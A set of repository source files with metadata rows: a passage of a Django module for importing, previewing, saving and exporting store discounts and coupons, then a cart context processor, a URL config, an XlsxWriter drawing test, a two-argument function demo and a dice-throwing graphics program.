                                keyword = "disc_type"
                                disc_type = field_value
                            if column_name=="Coupon Code":
                                keyword = "coupon_code"
                            if column_name=="Coupon Type":
                                keyword = "coupon_type"
                            if column_name=="Generate Options":
                                keyword = "has_multiplecoupons"
                            if column_name=="Number of Coupons":
                                keyword = "used_coupon"
                            if column_name=="Coupon Prefix":
                                keyword = "coupon_prefix"
                            if column_name=="Coupon Suffix":
                                keyword = "coupon_suffix"
                            if column_name=="Discount Amount":
                                keyword = "amount"
                            if column_name=="Discount Starts":
                                keyword = "disc_start_date"
                            if column_name=="Discount End":
                                keyword = "disc_end_date"
                            if column_name=="Max. no of items":
                                keyword = "no_of_quantity_per"
                            if column_name=="Max Discount Amount":
                                keyword = "up_to_discount"
                            if column_name=="Offer Type":
                                keyword = "offer_type"
                            if column_name=="Customer Group":
                                keyword = "customer_group"
                            if column_name=="Status":
                                keyword = "isblocked"
                            if column_name=="SKU Equals To":
                                keyword = "sku_equals"
                            if column_name=="SKU Not Equals To":
                                keyword = "sku_not_equals"
                            if column_name=="Category Equals To":
                                keyword = "category_equals"
                            if column_name=="Category Not Equals To":
                                keyword = "category_not_equals"
                            if column_name=="Amount Equals To":
                                keyword = "amount_equals"
                            if column_name=="Amount Equals To>":
                                keyword = "amount_equals_greater"
                            if column_name=="Amount Equals To<":
                                keyword = "amount_equals_less"
                            if column_name=="Free Item sku":
                                keyword = "free_item_sku"
                            if column_name=="Free item Quantity":
                                keyword = "free_item_quantity"
                            if column_name=="Weekly Equals To":
                                keyword = "weekly_equals"
                            if column_name=="Weekly Not Equals To":
                                keyword = "weekly_not_equals"
                            if column_name=="Customer Equals To":
                                keyword = "customer_equals"
                            if column_name=="Customer Not Equals To":
                                keyword = "customer_not_equals"
                            if column_name=="Free Shipping":
                                keyword = "free_shipping"
                            d2.update({keyword:field_value})
                            # Normalise human-readable xls values to codes.
                            # NOTE(review): the third branch duplicates the
                            # first ("product"/"p"), so disc_type 4 is
                            # unreachable — confirm the intended code.
                            if d2['discount_type'].lower()=="product" and d2['disc_type'].lower()=="p":
                                d2.update({"disc_type":1})
                            elif d2['discount_type'].lower()=="product" and d2['disc_type'].lower()=="f":
                                d2.update({"disc_type":2})
                            elif d2['discount_type'].lower()=="product" and d2['disc_type'].lower()=="p":
                                d2.update({"disc_type":4})
                            elif d2['discount_type'].lower()=="coupon" and d2['disc_type'].lower()=="p":
                                d2.update({"disc_type":6})
                            elif d2['discount_type'].lower()=="coupon" and d2['disc_type'].lower()=="f":
                                d2.update({"disc_type":3})
                            elif d2['discount_type'].lower()=="coupon" and d2['disc_type'].lower()=="fh":
                                d2.update({"disc_type":7})
                            if d2['discount_type'].lower()=="product":
                                d2.update({"discount_type":"p"})
                            elif d2['discount_type'].lower()=="coupon":
                                d2.update({"discount_type":"c"})
                            if d2['discount_type'].lower()=="coupon" and d2['coupon_type'].lower()=='single use':
                                d2.update({"coupon_type":1})
                            elif d2['discount_type'].lower()=="coupon" and d2['coupon_type'].lower()=='multiple use':
                                d2.update({"coupon_type":2})
                            if d2['has_multiplecoupons'].lower()=="single code":
                                d2.update({"has_multiplecoupons":'n'})
                            elif d2['has_multiplecoupons'].lower()=="multiple code":
                                d2.update({"has_multiplecoupons":'y'})
                            if d2['coupon_type'].lower()=="single use":
                                d2.update({"coupon_type":1})
                            elif d2['coupon_type'].lower()=="multiple use":
                                d2.update({"coupon_type":2})
                            if d2['isblocked'].lower()=="active":
                                d2.update({"isblocked":'n'})
                            elif d2['isblocked'].lower()=="inactive":
                                d2.update({"isblocked":'y'})
                            # Resolve the customer-group name to its id.
                            # NOTE(review): this lookup omits .using(company_db).
                            if d2['customer_group']!="" and d2['customer_group']!=None:
                                obj = EngageboostCustomerGroup.objects.filter(name=d2['customer_group'])
                                if obj.count()>0:
                                    custgrp=obj.last()
                                    d2.update({"customer_group":custgrp.id})
                                else:
                                    d2.update({"customer_group":None})
                            # Excel stores dates as serial floats; convert via
                            # the workbook datemode, keeping only the date part.
                            workbook_datemode = csvReader.datemode
                            y, M, d, h, m, s = xlrd.xldate_as_tuple(d2['disc_start_date'], workbook_datemode)
                            d2['disc_start_date'] = ("{0}-{1}-{2}".format(y, M, d, h, m, s))
                            y, M, d, h, m, s = xlrd.xldate_as_tuple(d2['disc_end_date'], workbook_datemode)
                            d2['disc_end_date'] = ("{0}-{1}-{2}".format(y, M, d, h, m, s))
                            d2['disc_start_date'] = datetime.datetime.strptime(d2['disc_start_date'],'%Y-%m-%d').strftime('%Y-%m-%dT%H:%M:%SZ')
                            d2['disc_end_date'] = datetime.datetime.strptime(d2['disc_end_date'],'%Y-%m-%d').strftime('%Y-%m-%dT%H:%M:%SZ')
                            serializer_data=dict(serializer_data,**d2)
                    # NOTE(review): silently swallows missing-column errors.
                    except KeyError: no=""
                    current_time = datetime.datetime.now(datetime.timezone.utc).astimezone()
                    d1={"created":current_time,"modified":current_time};
                    serializer_data=dict(serializer_data,**d1)
                    try:
                        save_temp_product = EngageboostTempDiscountMasters.objects.using(company_db).create(**serializer_data)
                        data_status = {"status":1,"filename":post_data["filename"]}
                    except Exception as e :
                        data_status = {"status":0,"filename":post_data["filename"],'errors':str(e) }
            # Remove the uploaded file once all rows have been staged.
            os.remove(settings.BASE_DIR+uploaded_file_url)
        else:
            data_status = {"status":0,"filename":post_data["filename"],'errors':"File Not Exists" }
        return Response(data_status)
class PreviewSaveFileDiscounts(generics.ListAPIView):
    """Preview the temp-imported discount rows staged for a given file."""

    def post(self, request, format=None):
        company_db = loginview.db_active_connection(request)
        params = request.data
        response = {}
        if params["model"] == "discount":
            preview_rows = []
            temp_rows = EngageboostTempDiscountMasters.objects.using(company_db).filter(
                website_id=params['website_id'], file_name=params['filename'])
            if temp_rows:
                serialized = TempDiscountsSerializer(temp_rows, many=True)
                for row in serialized.data:
                    # Validation hooks are not wired in, so every staged row
                    # is flagged importable ("SUCCESS").
                    row["error"] = 0
                    row["error_message"] = ["SUCCESS"]
                preview_rows = serialized.data
            response = {"preview_data": preview_rows, "filename": params['filename']}
        return Response(response)
class SaveAllImportedDiscounts(generics.ListAPIView):
    """Promote the selected temp-import rows into real discount masters."""

    def post(self, request, format=None):
        """Validate and save each selected temp row via DiscountMasterSerializer,
        then delete all temp rows for the import file.

        Fixes over the original: ``responseDatas`` was unbound (NameError at
        the return) when no temp rows matched the selected ids, and
        ``discount_master_type`` was unbound for a discount_type other than
        'c'/'p'; both now have safe defaults.
        """
        company_db = loginview.db_active_connection(request)
        datas = []
        fetch_temp_datas = []
        post_data = request.data
        for raw_id in post_data["selected_ids"].split(','):
            temp_row = EngageboostTempDiscountMasters.objects.using(company_db).filter(
                id=int(raw_id)).first()
            if temp_row:
                fetch_temp_datas.append(TempDiscountsSerializer(temp_row, partial=True).data)
        # Default response so an empty selection no longer raises NameError.
        responseDatas = {"status": 1, "api_response": datas, "message": 'Discounts Saved'}
        for temp_data in fetch_temp_datas:
            serializer_data = dict(temp_data)
            # 'c' = coupon discount (type 1); anything else is treated as a
            # product discount (type 0).
            discount_master_type = 1 if temp_data['discount_type'] == "c" else 0
            current_time = datetime.datetime.now(datetime.timezone.utc).astimezone()
            serializer_data.update({
                "discount_master_type": discount_master_type,
                "website_id": temp_data["website_id"],
                "created": current_time,
                "modified": current_time,
            })
            datas.append(serializer_data)
            serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
            if serializer.is_valid():
                serializer.save()
                responseDatas = {"status": 1, "api_response": datas,
                                 "message": 'Discounts Saved'}
            else:
                datas.append({'status': 0, 'api_status': serializer.errors,
                              'message': 'Error Occured'})
                responseDatas = {"status": 0, "api_response": datas,
                                 "message": 'Error Occured in Discounts'}
        # Clear the temp rows for this import file regardless of outcome.
        EngageboostTempDiscountMasters.objects.using(company_db).filter(
            file_name=post_data['filename']).delete()
        return Response(responseDatas)
# Set discount condition(Insert new records)
class DiscountCouponCondition(generics.ListAPIView):
    def post(self, request, format=None):
        """Replace all condition rows of a coupon discount with the posted set.

        Each entry in ``request.data['value']`` carries a ``fields`` code:
        -1 order amount, -2 customers, -3 week days, -4 free shipping,
        9175 SKUs, 0 categories; anything else is rejected.

        Fixes over the original: the failure response referenced
        ``serializer.errors`` on paths where ``serializer`` was never
        assigned (e.g. unknown discount id), raising NameError — the
        collected ``error`` list is reported instead; the id-allocation
        query now uses the tenant DB consistently.
        """
        company_db = loginview.db_active_connection(request)
        discount_master_id = request.data['discount_master_id']
        error = []
        disc_cnt = EngageboostDiscountMasters.objects.using(company_db).filter(
            id=discount_master_id, discount_type="c").count()
        if disc_cnt > 0:
            # Replace semantics: wipe any previously saved conditions first.
            EngageboostDiscountMastersConditions.objects.using(company_db).filter(
                discount_master_id=discount_master_id).delete()
            for data in request.data['value']:
                if data['fields'] in ("-1", "-2", "-3", "-4", "9175", "0"):
                    # Manual id allocation from the current max id.
                    last_row = EngageboostDiscountMastersConditions.objects.using(
                        company_db).order_by('-id').first()
                    row_id = last_row.id + 1 if last_row else 1
                    # Per-field-type required-value validation.  NOTE: as in
                    # the original, a failed row is recorded in ``error`` but
                    # is still passed to the serializer below.
                    if data['fields'] == "-2" and data.get('all_customer_id') in ("", None):
                        data.update({"error": "Select customers"})
                        error.append(data)
                    elif data['fields'] == "-3" and data.get('all_day_id') in ("", None):
                        data.update({"error": "Select Days"})
                        error.append(data)
                    elif data['fields'] in ("-4", "-1") and data.get('value') in ("", None):
                        data.update({"error": "Enter value"})
                        error.append(data)
                    elif data['fields'] == "9175" and data.get('all_product_id') in ("", None):
                        data.update({"error": "Select Products"})
                        error.append(data)
                    elif data['fields'] == "0" and data.get('all_category_id') in ("", None):
                        data.update({"error": "Select Categories"})
                        error.append(data)
                    current_time = datetime.datetime.now().strftime("%Y-%m-%d")
                    data = dict(data, id=row_id, created=current_time,
                                modified=current_time)
                    serializer = DiscountConditionsSerializer(data=data, partial=True)
                    if serializer.is_valid():
                        serializer.save()
                    else:
                        data.update({"error": serializer.errors})
                        error.append(data)
                else:
                    data.update({"error": "Invalid discount type"})
                    error.append(data)
        else:
            error.append("Invalid discount")
        if error:
            context = {
                'status': 0,
                'api_status': error,
                'message': 'Something went wrong',
            }
        else:
            context = {
                'status': 1,
                'api_status': '',
                'message': 'Successfully Inserted',
            }
        return Response(context)
# Set discount condition(Insert new records)
class DiscountProductFree(generics.ListAPIView):
    """Create a 'free product' discount master record.

    POST handler: stamps created/modified timestamps onto the payload,
    persists it through DiscountMasterSerializer and then refreshes the
    Elasticsearch documents of every product attached to the discount's
    conditions so channel/currency prices reflect the new promotion.
    """
    def post(self, request, format=None):
        data=request.data
        # Switch the ORM to the tenant database for this request.
        company_db = loginview.db_active_connection(request)
        now = datetime.datetime.now()
        # Timezone-aware timestamp used for both created and modified.
        current_time = datetime.datetime.now(datetime.timezone.utc).astimezone()
        d3 = {"created":current_time,"modified":current_time}
        data = dict(data,**d3)
        #print(data)
        serializer = DiscountMasterSerializer(data=data,partial=True)
        if serializer.is_valid():
            # Snapshot the products linked to this discount *before* saving,
            # so their Elasticsearch docs can be refreshed as well.
            # NOTE(review): serializer.id is read before serializer.save();
            # a plain DRF serializer has no .id until save -- confirm
            # DiscountMasterSerializer defines it. Also note this query does
            # not use .using(company_db) like other queries here -- verify.
            prev_products = list(EngageboostDiscountMastersConditions.objects.filter(discount_master_id = serializer.id).values_list('all_product_id',flat=True))
            serializer.save()
            # if(serializer.id):
            #     objproduct_list = EngageboostDiscountMastersConditions.objects.filter(discount_master_id = serializer.id).values_list('all_product_id',flat=True)
            #     if(prev_products):
            #         objproduct_list = list(objproduct_list)
            #         objproduct_list.extend(prev_products)
            #         objproduct_list = list(set(objproduct_list))
            #     if objproduct_list :
            #         for elastic_product_id in objproduct_list:
            #             if(elastic_product_id!=""):
            #                 if("," in elastic_product_id):
            #                     prod_lst = elastic_product_id.split(",")
            #                     for prod_id in prod_lst:
            #                         if(prod_id!=""):
            #                             elastic = common.save_data_to_elastic(int(prod_id),'EngageboostProducts')
            #                 else:
            #                     elastic = common.save_data_to_elastic(int(elastic_product_id),'EngageboostProducts')
            if(serializer.id):
                # Combine the post-save condition products with the pre-save
                # snapshot and de-duplicate before pushing to Elasticsearch.
                objproduct_list = EngageboostDiscountMastersConditions.objects.filter(discount_master_id = serializer.id).values_list('all_product_id',flat=True)
                if(prev_products):
                    objproduct_list = list(objproduct_list)
                    objproduct_list.extend(prev_products)
                    objproduct_list = list(set(objproduct_list))
                if objproduct_list :
                    for elastic_product_id in objproduct_list:
                        # all_product_id may be a single id or a
                        # comma-separated list of ids stored as one string.
                        if(elastic_product_id != "" and elastic_product_id is not None):
                            try:
                                if("," in elastic_product_id):
                                    prod_lst = elastic_product_id.split(",")
                                    elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst,'channel_currency_product_price','update')
                                else:
                                    elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
                            except:
                                # Best-effort fallback: retry as a single id
                                # if the comma-split path failed.
                                elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
            context ={
                'status':1,
                'api_status':'',
                'message':'Successfully Inserted',
            }
        else:
            context ={
                'status':0,
                'api_status':serializer.errors,
                'message':'Something went wrong',
            }
        return Response(context)
# return Response(datas)
class CouponExport(generics.ListAPIView):
    """Export all coupons of one promotion to an .xlsx file.

    POST handler: writes ID / Coupon Code / Is Used columns for every
    non-deleted coupon of the given discount_master_id and returns the
    generated file path (status 1) or an error payload (status 0).
    """
    def post(self, request, *args, **kwargs):
        company_db = loginview.db_active_connection(request)
        try:
            discount_master_id=request.data['discount_master_id']
            ## ************ Check file dir exist or not. If dir not exist then create
            file_dir = settings.MEDIA_ROOT+'/exportfile/'
            export_dir = settings.MEDIA_URL+'exportfile/'
            if not os.path.exists(file_dir):
                os.makedirs(file_dir)
            ## ************ Create file name
            # Random suffix avoids clobbering earlier exports.
            file_name = "coupon_export_"+get_random_string(length=5)
            ## Create file full path
            file_path = file_dir+file_name+'.xlsx'
            export_file_path = export_dir+file_name+'.xlsx'
            # Drop the leading "/" of MEDIA_URL to return a relative path.
            export_file_path = export_file_path[1:]
            workbook = xlsxwriter.Workbook(file_path)
            worksheet = workbook.add_worksheet()
            bold = workbook.add_format({'bold': True})
            row = 1
            # Header row.
            worksheet.write(0,0,'ID',bold)
            worksheet.write(0,1,'Coupon Code',bold)
            worksheet.write(0,2,'Is Used',bold)
            is_used = ""
            result = EngageboostDiscountMastersCoupons.objects.using(company_db).filter(isdeleted='n',discount_master_id=discount_master_id).order_by('id')
            result_count = result.count()
            if result_count>0:
                result_data = DiscountMasterCouponSerializer(result, many=True)
                result_data = result_data.data
                for resultdata in result_data:
                    # Map the y/n flag to a human-readable value.
                    if resultdata['is_used']=="y":
                        is_used = "Yes"
                    else:
                        is_used = "No"
                    # NOTE(review): the trailing 0 is passed where xlsxwriter
                    # expects a cell format object -- confirm it is intended.
                    worksheet.write(row,0,resultdata['id'],0)
                    worksheet.write(row,1,resultdata['coupon_code'],0)
                    worksheet.write(row,2,is_used,0)
                    row = row + 1
                workbook.close()
                data ={'status':1,"file_path":export_file_path}
            else:
                # NOTE(review): workbook.close() is only called on the success
                # branch, so an empty export leaves the file handle open.
                data ={'status':0,"message":"No coupon found for this promotion"}
        except Exception as error:
            # Report the failing line number and full traceback to the caller.
            trace_back = sys.exc_info()[2]
            line = trace_back.tb_lineno
            data = {"status":0,"api_status":traceback.format_exc(),"error_line":line,"error_message":str(error),"message": str(error)}
        return Response(data)
# @csrf_exempt
# @permission_classes((AllowAny,))
def check_exported_data(serializer_data, request):
    """Validate one imported discount/coupon row.

    Merges a validation summary (``status``, ``err_flag``, ``error_text``)
    into *serializer_data* and returns the merged dict; ``err_flag`` is 1
    when at least one error was found, 0 otherwise.  When the ISO date
    strings parse successfully they are replaced in place with ``datetime``
    objects (callers rely on this side effect).

    Bug fix: the previous version called ``strptime`` unconditionally, so a
    blank date string raised ValueError before any check ran and the
    "should not blank" date checks were unreachable dead code.
    """
    company_db = loginview.db_active_connection(request)
    d2 = {'status': '', 'err_flag': '', 'error_text': []}
    current_time = datetime.datetime.now()

    # Parse the dates defensively; only compare them when parsing succeeded.
    disc_start_date = None
    disc_end_date = None
    if serializer_data['disc_start_date'] == "":
        d2['error_text'].append("Start date should not blank")
    else:
        try:
            disc_start_date = datetime.datetime.strptime(
                serializer_data['disc_start_date'], '%Y-%m-%dT%H:%M:%SZ')
            serializer_data['disc_start_date'] = disc_start_date
        except (TypeError, ValueError):
            d2['error_text'].append("Start date is invalid")
    if serializer_data['disc_end_date'] == "":
        d2['error_text'].append("End date should not blank")
    else:
        try:
            disc_end_date = datetime.datetime.strptime(
                serializer_data['disc_end_date'], '%Y-%m-%dT%H:%M:%SZ')
            serializer_data['disc_end_date'] = disc_end_date
        except (TypeError, ValueError):
            d2['error_text'].append("End date is invalid")
    if disc_start_date is not None and disc_start_date < current_time:
        d2['error_text'].append("Start date should not less than current date")
    if disc_end_date is not None and disc_end_date < current_time:
        d2['error_text'].append("End date should not less than current date")
    if (disc_start_date is not None and disc_end_date is not None
            and disc_end_date <= disc_start_date):
        d2['error_text'].append("End date should be greater than Start date")

    # Duplicate coupon-code check against active (not blocked/deleted) rows.
    coupon = EngageboostDiscountMasters.objects.using(company_db).filter(
        coupon_code=serializer_data['coupon_code'],
        isblocked="n", isdeleted="n").count()

    if serializer_data['discount_type'] == 'coupon' and serializer_data['coupon_code'] == "" and serializer_data['has_multiplecoupons'] == "Single Code":
        d2['error_text'].append("Coupon code is missing")
    if serializer_data['discount_type'] == 'coupon' and serializer_data['has_multiplecoupons'] == "Multiple Code" and serializer_data['used_coupon'] <= 0:
        d2['error_text'].append("Number of coupons should not blank")
    if serializer_data['discount_type'] == 'product' and serializer_data['offer_type'] == "":
        d2['error_text'].append("Offer type should not blank")
    if serializer_data['coupon_type'] == "" and serializer_data['discount_type'] == 'coupon':
        d2['error_text'].append("Coupon type does not exist")
    if serializer_data['name'] == "":
        d2['error_text'].append("Discount name is missing")
    if serializer_data['amount'] == "":
        d2['error_text'].append("Discount amount should not blank")
    if serializer_data['offer_type'] == "":
        d2['error_text'].append("Offer type is missing")
    if serializer_data['customer_group'] == "":
        d2['error_text'].append("Customer group is missing")
    if serializer_data['isblocked'] == "":
        d2['error_text'].append("Status is missing")
    if serializer_data['disc_type'] == "":
        d2['error_text'].append("Apply per should not blank")
    if coupon > 0:
        d2['error_text'].append("Coupon code exist")

    d2['err_flag'] = 1 if d2['error_text'] else 0
    serializer_data = dict(serializer_data, **d2)
    return serializer_data
"mjamal@lifcoshop.net"
] | mjamal@lifcoshop.net |
f60a796426a088065e486da9f6fc3e3d52b7acb5 | d671ae8abe44541b6942c1ddb799dc23353157c1 | /cart/contexts.py | 71b966dfc82175dea5e8642e8a74acd51f0c237f | [
"MIT"
] | permissive | Walachul/milestone4 | f3dbbca09c49feeb39dbb4a46691012eeadfaae2 | ce3be4d39b5d28141f41d4783d3e7211480ce64d | refs/heads/master | 2022-12-11T15:06:49.227485 | 2020-02-27T21:47:16 | 2020-02-27T21:47:16 | 205,703,804 | 0 | 1 | MIT | 2022-12-08T06:58:37 | 2019-09-01T16:34:58 | Python | UTF-8 | Python | false | false | 712 | py | from django.shortcuts import get_object_or_404
from products.models import Product
def cart_contents(request):
    """
    Context processor exposing the session cart to every template.

    Reads the "cart" mapping stored on the session ({product_id: quantity}),
    resolves each product from the database, and returns the line items
    together with the price total and the overall item count.  The cart
    lives in the session, so it disappears when the user logs out.
    """
    session_cart = request.session.get("cart", {})
    items = []
    grand_total = 0
    quantity_sum = 0
    for product_id, qty in session_cart.items():
        product = get_object_or_404(Product, pk=product_id)
        items.append({"id": product_id, "quantity": qty, "product": product})
        grand_total += qty * product.price
        quantity_sum += qty
    return {"cart_items": items, "total": grand_total, "item_count": quantity_sum}
| [
"42890101+Walachul@users.noreply.github.com"
] | 42890101+Walachul@users.noreply.github.com |
1e5bef82c6328f42d541657e2b7873943f399850 | 5a5f58c3de67e6668f565c01071aab4ab301d43e | /function_multiple_arguments.py | ebc47cace9a71257419e8df6b72a99c81ea4b42f | [] | no_license | FabianTauriello/Problem-Solving-And-Programming-Textbook-Problems-Python- | bde9d59abca7307e0b413529e12736d13c817cee | 59a99131bd3addd5278c427d0c0d6a44508a1363 | refs/heads/master | 2021-09-07T00:29:06.672161 | 2018-02-14T07:11:52 | 2018-02-14T07:11:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | # This program demonstrates a function that accepts two arguments
def main():
    """Demo driver: print a label, then display the sum of 12 and 45."""
    print('The sum of 12 and 45 is')
    show_sum(12,45)
# The show_sum function accepts two numeric arguments and
# prints their sum to standard output.
def show_sum(num1, num2):
    """Display the sum of num1 and num2."""
    print(num1 + num2)
# Call the main function
main()
| [
"noreply@github.com"
] | noreply@github.com |
c1a849a3ef968a12653876769b2c0efefab85133 | 8569b19a31f0b506ab6ded1da8f1e9b2c6a54238 | /moderate/urls.py | a43ea376faa64edd6fa1367c9ab69212016a329b | [
"MIT"
] | permissive | sandnima/blog-with-Django | 460a5a8bb78357cfcfab44d456f3e452ddaa443e | 77cb90f4e3aa70efa8d5190146f6acb4cd22d9a7 | refs/heads/main | 2023-06-24T20:45:25.346095 | 2021-07-27T14:26:05 | 2021-07-27T14:26:05 | 378,387,526 | 0 | 0 | MIT | 2021-07-12T19:17:16 | 2021-06-19T10:43:26 | JavaScript | UTF-8 | Python | false | false | 289 | py | from django.urls import path
from .views import (
moderate,
article_list
)
app_name = 'moderate'
urlpatterns = [
path('', moderate, name='index'),
path('blog/', article_list, name='article_list_index'),
path('blog/p-<int:page>/', article_list, name='article_list'),
]
| [
"46921550+sandnima@users.noreply.github.com"
] | 46921550+sandnima@users.noreply.github.com |
86c4579e69639f21cd77bf45cfc84b101d9ccfff | cf5b2850dc9794eb0fc11826da4fd3ea6c22e9b1 | /xlsxwriter/test/drawing/test_drawing_chart01.py | 5c7893a9c2c67067496a261dfe31cb992bb3ae86 | [
"BSD-2-Clause"
] | permissive | glasah/XlsxWriter | bcf74b43b9c114e45e1a3dd679b5ab49ee20a0ec | 1e8aaeb03000dc2f294ccb89b33806ac40dabc13 | refs/heads/main | 2023-09-05T03:03:53.857387 | 2021-11-01T07:35:46 | 2021-11-01T07:35:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,125 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...drawing import Drawing
class TestAssembleDrawing(unittest.TestCase):
"""
Test assembling a complete Drawing file.
"""
def test_assemble_xml_file(self):
"""Test writing a drawing with no cell data."""
self.maxDiff = None
fh = StringIO()
drawing = Drawing()
drawing._set_filehandle(fh)
dimensions = [4, 8, 457200, 104775, 12, 22, 152400, 180975, 0, 0]
drawing_object = drawing._add_drawing_object()
drawing_object['type'] = 1
drawing_object['dimensions'] = dimensions
drawing_object['width'] = 0
drawing_object['height'] = 0
drawing_object['description'] = None
drawing_object['shape'] = None
drawing_object['anchor'] = 1
drawing_object['rel_index'] = 1
drawing_object['url_rel_index'] = 0
drawing_object['tip'] = None
drawing.embedded = 1
drawing._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
<xdr:twoCellAnchor>
<xdr:from>
<xdr:col>4</xdr:col>
<xdr:colOff>457200</xdr:colOff>
<xdr:row>8</xdr:row>
<xdr:rowOff>104775</xdr:rowOff>
</xdr:from>
<xdr:to>
<xdr:col>12</xdr:col>
<xdr:colOff>152400</xdr:colOff>
<xdr:row>22</xdr:row>
<xdr:rowOff>180975</xdr:rowOff>
</xdr:to>
<xdr:graphicFrame macro="">
<xdr:nvGraphicFramePr>
<xdr:cNvPr id="2" name="Chart 1"/>
<xdr:cNvGraphicFramePr/>
</xdr:nvGraphicFramePr>
<xdr:xfrm>
<a:off x="0" y="0"/>
<a:ext cx="0" cy="0"/>
</xdr:xfrm>
<a:graphic>
<a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
<c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
</a:graphicData>
</a:graphic>
</xdr:graphicFrame>
<xdr:clientData/>
</xdr:twoCellAnchor>
</xdr:wsDr>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
4dfad2ec527357f9654b531f2f4558bcd9651f47 | 2179ae6ea7da99fd58c968281f9dcdb28684214c | /ZhangYiwuHomework05Sec01.py | 99027497422680542f8c329692e5cfa1e4bceb30 | [] | no_license | Wintus/MyPythonCodes | 86d5aad9fabae0f6ed58b63741e44135bfee903e | 316d20c39c2de5960b094611c092805895037df7 | refs/heads/master | 2023-08-31T21:07:27.630010 | 2023-08-21T18:00:33 | 2023-08-21T18:00:33 | 29,950,620 | 0 | 0 | null | 2023-08-21T18:00:01 | 2015-01-28T04:32:30 | Python | UTF-8 | Python | false | false | 3,876 | py | # Project: Throw dice(ZhangYiwuHomework05Sec01.py)
# Name: Yiwu Zhang
# Date: 06/03/14
# Description: This program will let user throw five dices
from graphics import *
from random import randint
def textbox(center, text, width, height, win):
    """Draw a rectangle of the given size with centred text on *win*.

    Returns the (Text, Rectangle) pair so callers can hit-test the box
    and update the label later.
    """
    half_w = width / 2
    half_h = height / 2
    corner1 = Point(center.getX() - half_w, center.getY() - half_h)
    corner2 = Point(center.getX() + half_w, center.getY() + half_h)
    box = Rectangle(corner1, corner2)
    box.draw(win)
    label = Text(center, text)
    label.draw(win)
    return label, box
def dice(intNumber, center, intSize, win):
    """Draw one die face of side *intSize* showing *intNumber* pips."""
    # White square for the die body.
    half = intSize / 2
    corner1 = Point(center.getX() - half, center.getY() - half)
    corner2 = Point(center.getX() + half, center.getY() + half)
    face = Rectangle(corner1, corner2)
    face.draw(win)
    face.setFill("white")
    # Pip layout: spacing from the centre and pip radius scale with the size.
    spacing = intSize / 4
    pip_radius = intSize / 10
    for pip_center in calcPoints(center, spacing, intNumber):
        dot(pip_center, pip_radius, win)
def calcPoints(center, intSpace, intNumber):
    """Return the pip centre points for a die face showing *intNumber* (1-6).

    Bug fix: the centre pip was previously added for every value 1-5
    (``range(1, 5 + 1)``), which drew 3 pips for a 2 and 5 pips for a 4;
    on a real die only the odd faces (1, 3, 5) have a centre pip.
    """
    listPoints = []
    # Centre pip: odd faces only.
    if intNumber in (1, 3, 5):
        listPoints.append(center.clone())
    # Main diagonal pair (upper-left / lower-right): faces 2-6.
    if intNumber in range(2, 6 + 1):
        listPoints.append(Point(center.getX() - intSpace, \
                                center.getY() - intSpace))
        listPoints.append(Point(center.getX() + intSpace, \
                                center.getY() + intSpace))
    # Anti-diagonal pair (upper-right / lower-left): faces 4-6.
    if intNumber in range(4, 6 + 1):
        listPoints.append(Point(center.getX() + intSpace, \
                                center.getY() - intSpace))
        listPoints.append(Point(center.getX() - intSpace, \
                                center.getY() + intSpace))
    # Middle row pair: face 6 only.
    if intNumber == 6:
        listPoints.append(Point(center.getX() - intSpace, center.getY()))
        listPoints.append(Point(center.getX() + intSpace, center.getY()))
    # return a list of pip centre points
    return listPoints
def dot(center, radius, win):
    """Draw one filled black pip (circle) on *win*."""
    pip = Circle(center, radius)
    pip.draw(win)
    pip.setFill("black")
def isClicked(rectangle, clicked):
    """Return True when *clicked* lies strictly inside *rectangle*."""
    corner_a = rectangle.getP1()
    corner_b = rectangle.getP2()
    return (corner_a.getX() < clicked.getX() < corner_b.getX()
            and corner_a.getY() < clicked.getY() < corner_b.getY())
def main():
    """Run the dice GUI: five clickable dice, a running total and an EXIT button."""
    # make a window
    win = GraphWin("dice", 600, 300)
    #5 coordinates for each boxes
    point1 = Point(80, 150)
    point2 = Point(190, 150)
    point3 = Point(300,150)
    point4 = Point(410, 150)
    point5 = Point(520, 150)
    points = (point1, point2, point3, point4, point5)
    # Placeholder list; each slot is replaced below by the (Text, Rectangle)
    # pair returned by textbox().
    squares = list(range(5))
    # make a exit button
    exitButton = textbox(Point(540, 270), "EXIT", 80, 50, win) # (text, box)
    # make a text
    Text(Point(135, 250), "dice total").draw(win)
    # show the total
    intSum = 0
    listSum = [0] * 5
    textSum = Text(Point(135, 275), str(intSum))
    textSum.draw(win)
    # draw dices
    for i in range(5):
        p = points[i]
        squares[i] = textbox(p, "Dice {}".format(i) , 90, 90, win)
##        dice(randint(1, 6), p, 80, win)
    # catch mouse clicks
    # NOTE(review): after win.close() the loop keeps running and calls
    # win.getMouse() on a closed window -- the loop never breaks cleanly.
    while True:
        clicked = win.getMouse()
        if isClicked(exitButton[1], clicked):
            win.close()
        for i in range(5):
##        for atextbox in squares:
            box = squares[i][1]
            if isClicked(box, clicked):
                intRandom = randint(1, 6)
                print(intRandom)
                listSum[i] = intRandom
                # Redraws a die face on top of the labelled box; the author
                # flagged this overlap as a SEVERE BUG.
                dice(intRandom, box.getCenter(), 80, win) # SEVERE BUG
                print(intRandom)
##                textSum.undraw()
                intSum = sum(listSum)
                textSum.setText(str(intSum))
main()
| [
"132e84e5@opayq.com"
] | 132e84e5@opayq.com |
